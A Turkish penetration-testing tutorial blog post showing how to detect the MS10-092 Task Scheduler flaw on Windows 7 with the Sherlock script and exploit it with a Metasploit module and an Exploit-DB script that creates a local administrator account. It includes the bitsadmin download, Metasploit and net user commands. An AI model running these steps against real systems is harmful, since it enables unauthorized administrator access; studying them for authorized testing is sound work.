Sherlock Betiği İle Tespit Edilen MS10-092 Hak Yükseltme Zafiyetinin MSF ms10_092_schelevator Modülü ve Exploit-DB Betiği ile İstismar Edilmesi

0
180
views
Windows sızma testleri sırasında standart haklar ile erişim sağlanabilmiş bir bilgisayarda, hak yükseltilerek yönetici hakları elde edilmeye çalışılır. Hak yükseltmek için kullanılan yöntemlerden birisi de işletim sistemindeki zafiyetlerin istismar edilmesidir. Bu yazıda, 64 bit mimarideki Windows 7 işletim sistemine sahip bir bilgisayarda, CVE-2010-3338 ve CVE-2010-3888 ID’li, MS10-092 bültenine ait “Vulnerability in Task Scheduler Could Allow Elevation of Privilege” zafiyeti Sherlock betiği ile tespit edildikten sonra Exploit-DB üzerinden indirilen betik ile istismar edilerek standart yetkilere sahip bir kullanıcı hesabı ile elde edilmiş oturumda yetkili kullanıcı yetkileri ile komut çalıştırılacaktır.

Mevcut durumda “YetkisizHesap” adlı standart bir kullanıcı yetkisi ile erişim sağlandığı varsayılmaktadır.

whoami

 

Bu kullanıcının yetkisini yükseltmek için öncelikle Sherlock betiği indirilip çalıştırılarak zafiyetler listelenecek, sonra da MS10-092 zafiyeti istismar edilerek hak yükseltilecektir.

 

1) Sherlock Betiği ile Hak Yükseltme Zafiyetinin Tespiti

Hak yükseltme zafiyetinin tespiti için Sherlock betiği kullanılabilir.

https://github.com/rasta-mouse/Sherlock

 

Bu betik dosyasını indirmek için bitsadmin aracı kullanılabilir.

bitsadmin /transfer DosyaIndir /download /priority normal https://raw.githubusercontent.com/rasta-mouse/Sherlock/master/Sherlock.ps1 %TEMP%\HakYukseltmeZafiyetiAra.ps1

 

Betik çalıştırıldığında bir takım zafiyetler aranmaktadır. Bu arama işlemi tek tek yapılabileceği gibi Find-AllVulns metodu ile de topluca yapılabilmektedir.

 

Sherlock betiği ile araştırılan hak yükseltme zafiyetlerinin listesi aşağıdaki gibidir.

  • MS10-015: User Mode to Ring (KiTrap0D) –> CVE-2010-0232
  • MS10-092: Task Scheduler –> CVE-2010-3338, CVE-2010-3888
  • MS13-053: NTUserMessageCall Win32k Kernel Pool Overflow –> CVE-2013-1300
  • MS13-081: TrackPopupMenuEx Win32k NULL Page –> CVE-2013-3881
  • MS14-058: TrackPopupMenu Win32k Null Pointer Dereference –> CVE-2014-4113
  • MS15-051: ClientCopyImage Win32k –> CVE-2015-2433
  • MS15-078: Font Driver Buffer Overflow –> CVE-2015-2426, CVE-2015-2433
  • MS16-016: ‘mrxdav.sys’ WebDAV –> CVE-2016-0051
  • MS16-032: Secondary Logon Handle –> CVE-2016-0099
  • MS16-034: Windows Kernel-Mode Drivers EoP –> CVE-2016-0093, CVE-2016-0094, CVE-2016-0095, CVE-2016-0096
  • MS16-135 : Win32k Elevation of Privilege –> CVE-2016-7255
  • CVE-2017-7199: Nessus Agent 6.6.2 – 6.10.3 Priv Esc –> CVE-2017-7199

 

64 bit mimaride ve 6.1.7600 sürümündeki Windows 7 işletim sisteminde Sherlock betiği çalıştırıldığında bir takım zafiyetler keşfedilmiştir.

powershell
Import-Module .\Sherlock.ps1
Find-AllVulns

 

2) MSF ms10_092_schelevator İstismar Modülü ile Hak Yükseltme

Sherlock betiği tarafından tespit edilen zafiyetlerden birisi “Microsoft Windows – Task Scheduler ‘.XML’ Local Privilege Escalation” isimli CVE-2010-3338 ve CVE-2010-3888 ID’li yetki yükseltme zafiyetidir. Sherlock betiğinin istismar koduna ait bağlantı MSF içerisindeki exploit/windows/local/ms10_092_schelevator modülüne aittir.

https://www.exploit-db.com/exploits/19930/

 

64 bitlik bir bağlantının elde edildiği bir oturumda MSF ms10_092_schelevator hak yükseltme betiği ile istismar işlemi gerçekleştirilebilir.

sessions
use exploit/windows/local/ms10_092_schelevator
show options

 

Modül seçenekleri ayarlanıp, modül çalıştırıldığında yeni bir bağlantının elde edilmiştir.

set SESSION 1
exploit

 

Bu bağlantı, NT AUTHORITY\SYSTEM ile çalışan 64 bitliktaskeng.exe” prosesinden oluştuğu ve yine NT AUTHORITY\SYSTEM yetkisine sahip oldunduğu görülmektedir.

getuid
getpid
ps -s

 

3) Exploit-DB’den İndirilen Betik ile Hak Yükseltme

Sherlock betiği tarafından tespit edilen CVE-2010-3338 ve CVE-2010-3888 ID’li yetki yükseltme zafiyeti için “Microsoft Windows – Task Scheduler Privilege Escalation” betiği de kullanılabilir.

 

Bu istismar kodu XML formatındaki bir zamanlanmış görevi oluşturmakta ve çağırmaktadır.

https://www.exploit-db.com/exploits/15589/

 

Bu betik ile “wDw00t” isimli bir zamanlanmış görev kullanılmaktadır. Başarılı bir zafiyet sonrasında, “xpl.bat” dosyasında da yazılacak olan “test123” isimli ve parolalı bir yerel yönetici kullanıcısı oluşturulmaktadır. Sonrasında da zamanlanmış görev silinmektedir.

 

Hak yükseltmeden önce “test123” adlı bir yerel yönetici kullanıcının olmadığı görülmektedir.

net user
net localgroup Administrators

 

Hak yükseltmek için ilgili betik dosyası Exploit-DB sitesinden indirilip çalıştırıldığında, “test123” adlı yerel yönetici kullanıcısının oluşturulduğu görülmektedir.

 

Oluşan “wDw00t.xml” dosyasında da çalışan komutun bulunduğu “xpl.bat” dosyası incelenebilir.

 

 

CEVAP VER

Yorumunuzu giriniz
İsminizi giriniz